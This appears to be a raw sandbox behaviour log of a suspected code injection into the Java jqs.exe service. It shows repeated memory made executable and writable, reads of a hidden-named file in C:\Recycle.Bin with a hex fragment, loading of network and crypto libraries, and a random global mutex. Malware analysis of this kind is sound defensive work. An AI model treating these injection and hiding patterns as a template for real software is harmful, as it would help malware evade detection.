508 C:\Program Files\Java\jre6\bin\jqs.exe BAFC210 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D949088 2000 page execute and read and write page execute read success or wait 1 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
508 C:\Program Files\Java\jre6\bin\jqs.exe BB10D98 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
508 C:\Program Files\Java\jre6\bin\jqs.exe BB104E8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
508 C:\Program Files\Java\jre6\bin\jqs.exe BAF65C8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
508 C:\Program Files\Java\jre6\bin\jqs.exe BAFF660 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D94D508 2000 page execute and read and write page execute read success or wait 1 BAE95DC
508 C:\Program Files\Java\jre6\bin\jqs.exe 3D94D508 2000 page execute and read and write page execute and read and write success or wait 1 BAEEE64
System Activities:
+ System information queried
System info class Completion Count Source Address
BasicInformation success or wait 40 BAD6959
ProcessorInformation success or wait 40 BAD6959
+ Chronological sections
Operation Data Completion Time
Section loaded Path: C:\Program Files\Java\jre6\bin\client\classes.jsa Access: query and read Type: commit Baseaddress: 11B0000 Size: 13369344 Protection: readonly Mapped to pid: own pid success or wait 2102224889
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2102225153
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 1E70000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2102232285
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2102239112
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2102248525
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2102355457
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2102363090
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2102387370
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2102388961
Thread created PID: 508 TID: 2376 EIP: 7C8106F9 Imagepath: C:\Program Files\Java\jre6\bin\jqs.exe Injected: false success or wait 2102413424
Thread delayed Time: 0 TID: 9078 success or wait 2102416932
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2102434889
System info queried Type: BasicInformation success or wait 2102435194
System info queried Type: ProcessorInformation success or wait 2102435493
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102435896
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 20A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102463108
System info queried Type: BasicInformation success or wait 2102464347
System info queried Type: ProcessorInformation success or wait 2102466081
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102467285
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAF6E20 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102469005
Thread created PID: 508 TID: 2076 EIP: 7C8106F9 Imagepath: C:\Program Files\Java\jre6\bin\jqs.exe Injected: false success or wait 2102472044
Thread created PID: 508 TID: 1208 EIP: 7C8106F9 Imagepath: C:\Program Files\Java\jre6\bin\jqs.exe Injected: false success or wait 2102478072
Thread delayed Time: 0 TID: 9078 success or wait 2102481621
Thread delayed Time: 0 TID: 9078 success or wait 2102482021
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102482203
System info queried Type: BasicInformation success or wait 2102482504
System info queried Type: ProcessorInformation success or wait 2102482806
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102484187
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102490931
System info queried Type: BasicInformation success or wait 2102491854
System info queried Type: ProcessorInformation success or wait 2102493552
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102494868
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BB10A90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102496607
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102496922
System info queried Type: BasicInformation success or wait 2102497220
System info queried Type: ProcessorInformation success or wait 2102498936
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102499357
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102506048
System info queried Type: BasicInformation success or wait 2102508373
System info queried Type: ProcessorInformation success or wait 2102508677
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102509962
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102510292
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102510608
System info queried Type: BasicInformation success or wait 2102512309
System info queried Type: ProcessorInformation success or wait 2102512605
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102513065
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102520018
System info queried Type: BasicInformation success or wait 2102522252
System info queried Type: ProcessorInformation success or wait 2102522551
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102525240
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAFCF58 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102525549
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102527487
System info queried Type: BasicInformation success or wait 2102527792
System info queried Type: ProcessorInformation success or wait 2102528083
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102528526
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102537459
System info queried Type: BasicInformation success or wait 2102538292
System info queried Type: ProcessorInformation success or wait 2102539550
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102540821
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BB10168 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102542236
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2102543214
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2102545610
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2102548242
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2102560216
System info queried Type: BasicInformation success or wait 2102561952
System info queried Type: ProcessorInformation success or wait 2102562267
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102562689
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2102565461
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2102567809
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2102570053
System info queried Type: BasicInformation success or wait 2102572355
System info queried Type: ProcessorInformation success or wait 2102572664
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102575338
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAFC210 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102575654
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2102577471
System info queried Type: BasicInformation success or wait 2102577772
System info queried Type: ProcessorInformation success or wait 2102578112
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102578565
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102579780
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102582081
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102587038
System info queried Type: BasicInformation success or wait 2102587883
System info queried Type: ProcessorInformation success or wait 2102588221
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102589830
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BB10D98 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102593444
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2102594862
System info queried Type: BasicInformation success or wait 2102595590
System info queried Type: ProcessorInformation success or wait 2102595935
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102597351
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102598903
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102599602
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102604102
System info queried Type: BasicInformation success or wait 2102605372
System info queried Type: ProcessorInformation success or wait 2102606669
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102608836
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BB104E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102609169
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2102609557
System info queried Type: BasicInformation success or wait 2102609879
System info queried Type: ProcessorInformation success or wait 2102611169
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102612015
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102614203
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102615307
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102618867
System info queried Type: BasicInformation success or wait 2102620678
System info queried Type: ProcessorInformation success or wait 2102621406
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102624128
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAF65C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102624853
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2102625581
System info queried Type: BasicInformation success or wait 2102626899
System info queried Type: ProcessorInformation success or wait 2102627619
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102628041
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102629209
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102630933
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102634944
System info queried Type: BasicInformation success or wait 2102637804
System info queried Type: ProcessorInformation success or wait 2102638108
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102639829
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAFF660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102640130
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2102642032
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2102643460
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2102656743
System info queried Type: BasicInformation success or wait 2102658499
System info queried Type: ProcessorInformation success or wait 2102658808
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102659228
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102660390
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102662467
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102666052
System info queried Type: BasicInformation success or wait 2102668293
System info queried Type: ProcessorInformation success or wait 2102668599
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102670343
System info queried Type: BasicInformation success or wait 2102672723
System info queried Type: ProcessorInformation success or wait 2102673020
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102674864
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102676000
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102678095
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102681659
System info queried Type: BasicInformation success or wait 2102682506
System info queried Type: ProcessorInformation success or wait 2102684239
System info queried Type: BasicInformation success or wait 2102688500
System info queried Type: ProcessorInformation success or wait 2102688830
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102689249
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102691802
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102692485
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102697438
System info queried Type: BasicInformation success or wait 2102698353
System info queried Type: ProcessorInformation success or wait 2102698659
System info queried Type: BasicInformation success or wait 2102704552
System info queried Type: ProcessorInformation success or wait 2102704851
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102705272
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102708030
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102710124
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102713658
System info queried Type: BasicInformation success or wait 2102715921
System info queried Type: ProcessorInformation success or wait 2102716227
System info queried Type: BasicInformation success or wait 2102721867
System info queried Type: ProcessorInformation success or wait 2102722164
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102724007
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102725224
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102727341
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102732293
System info queried Type: BasicInformation success or wait 2102733141
System info queried Type: ProcessorInformation success or wait 2102734870
System info queried Type: BasicInformation success or wait 2102738870
System info queried Type: ProcessorInformation success or wait 2102740587
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102741063
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102743630
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102744310
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102749259
System info queried Type: BasicInformation success or wait 2102751527
System info queried Type: ProcessorInformation success or wait 2102751834
System info queried Type: BasicInformation success or wait 2102757353
System info queried Type: ProcessorInformation success or wait 2102757653
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102758074
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102761374
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102763607
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102767144
System info queried Type: BasicInformation success or wait 2102768019
System info queried Type: ProcessorInformation success or wait 2102768323
System info queried Type: BasicInformation success or wait 2102774054
System info queried Type: ProcessorInformation success or wait 2102774351
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102776118
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2102777257
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2102778182
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2102783157
System info queried Type: BasicInformation success or wait 2102784002
System info queried Type: ProcessorInformation success or wait 2102785730
System info queried Type: BasicInformation success or wait 2102787850
System info queried Type: ProcessorInformation success or wait 2102789555
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102789981
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2102792549
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2102793460
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2102797122
System info queried Type: BasicInformation success or wait 2102799368
System info queried Type: ProcessorInformation success or wait 2102799675
System info queried Type: BasicInformation success or wait 2102805309
System info queried Type: ProcessorInformation success or wait 2102805608
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102806027
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2102807192
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2102809648
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2102813098
System info queried Type: BasicInformation success or wait 2102817885
System info queried Type: ProcessorInformation success or wait 2102818955
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2102822539
Thread created PID: 508 TID: 684 EIP: 7C8106F9 Imagepath: C:\Program Files\Java\jre6\bin\jqs.exe Injected: false success or wait 2102826577
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2102844765
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 22A0000 Size: 77824 Protection: readonly Mapped to pid: own pid object name not found 2103404173
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2103406195
Thread delayed Time: 0 TID: 9078 success or wait 2103486900
Thread delayed Time: 0 TID: 9078 success or wait 2103682953
Thread delayed Time: 0 TID: 9078 success or wait 2103684852
Thread delayed Time: 0 TID: 9078 success or wait 2104613574
Thread delayed Time: 0 TID: 9078 success or wait 2104800280
Thread delayed Time: 0 TID: 9078 success or wait 2104803067
Thread delayed Time: 0 TID: 9078 success or wait 2106055503
Thread delayed Time: 0 TID: 9078 success or wait 2106058675
Thread delayed Time: 0 TID: 9078 success or wait 2106061233
Thread delayed Time: 0 TID: 9078 success or wait 2107696235
Thread delayed Time: 0 TID: 9078 success or wait 2107699785
Thread delayed Time: 0 TID: 9078 success or wait 2107701873
Thread delayed Time: 0 TID: 9078 success or wait 2108803454
Thread delayed Time: 0 TID: 9078 success or wait 2108807025
Thread delayed Time: 0 TID: 9078 success or wait 2108809256
Thread delayed Time: 0 TID: 9078 success or wait 2110283550
Thread delayed Time: 0 TID: 9078 success or wait 2110285179
Thread delayed Time: 0 TID: 9078 success or wait 2110286160
Thread delayed Time: 0 TID: 9078 success or wait 2111544727
Thread delayed Time: 0 TID: 9078 success or wait 2111546243
Thread delayed Time: 0 TID: 9078 success or wait 2111547112
Thread delayed Time: 0 TID: 9078 success or wait 2112664501
Thread delayed Time: 0 TID: 9078 success or wait 2112665999
Thread delayed Time: 0 TID: 9078 success or wait 2112666869
Thread delayed Time: 0 TID: 9078 success or wait 2113787816
Thread delayed Time: 0 TID: 9078 success or wait 2113789645
Thread delayed Time: 0 TID: 9078 success or wait 2113790577
Thread delayed Time: 0 TID: 9078 success or wait 2115129786
Thread delayed Time: 0 TID: 9078 success or wait 2115131826
Thread delayed Time: 0 TID: 9078 success or wait 2115132803
Thread delayed Time: 0 TID: 9078 success or wait 2116239065
Thread delayed Time: 0 TID: 9078 success or wait 2116240384
Thread delayed Time: 0 TID: 9078 success or wait 2116241669
Thread delayed Time: 0 TID: 9078 success or wait 2117608342
Thread delayed Time: 0 TID: 9078 success or wait 2117609817
